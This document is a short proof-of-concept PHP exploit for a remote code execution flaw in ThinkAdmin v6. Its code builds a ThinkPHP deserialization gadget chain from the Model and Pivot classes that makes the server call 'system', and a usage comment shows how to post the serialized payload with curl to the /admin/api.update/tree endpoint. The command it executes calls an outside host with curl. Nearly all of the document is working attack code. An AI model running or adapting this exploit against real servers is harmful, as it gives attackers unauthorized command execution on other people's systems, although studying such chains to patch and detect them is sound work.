POC for ThinkAdmin v6 RCE

poc.php

<?php

/*
 *
 * Date: 2020-02-06
 * Exploit Author: k4ii
 * Daemon Link: https://v6.thinkadmin.top
 * Version: v6
 * Tested on: linux
 * Usage:
 *      curl "https://v6.thinkadmin.top/admin/api.update/tree" -d "rules=`php poc.php`"
 */
namespace think\model\concern;
trait Conversion
{
}

trait Attribute
{
    private $data;
    private $withAttr = ["k4ii" => "system"];

    public function get()
    {
        $this->data = ["k4ii" => "curl http://10.1.1.1:9876/hacked"];  //  this code will be execution
    }
}

namespace think;
abstract class Model
{
    use model\concern\Attribute;
    use model\concern\Conversion;
    private $lazySave = false;
    protected $withEvent = false;
    private $exists = true;
    private $force = true;
    protected $field = [];
    protected $schema = [];
    protected $connection = 'mysql';
    protected $name;
    protected $suffix = '';

    function __construct()
    {
        $this->get();
        $this->lazySave = true;
        $this->withEvent = false;
        $this->exists = true;
        $this->force = true;
        $this->field = [];
        $this->schema = [];
        $this->connection = 'mysql';
    }

}

namespace think\model;

use think\Model;

class Pivot extends Model
{
    function __construct($obj = '')
    {
        parent::__construct();
        $this->name = $obj;
    }
}

$a = new Pivot();
$b = new Pivot($a);

echo(urlencode(serialize($b)));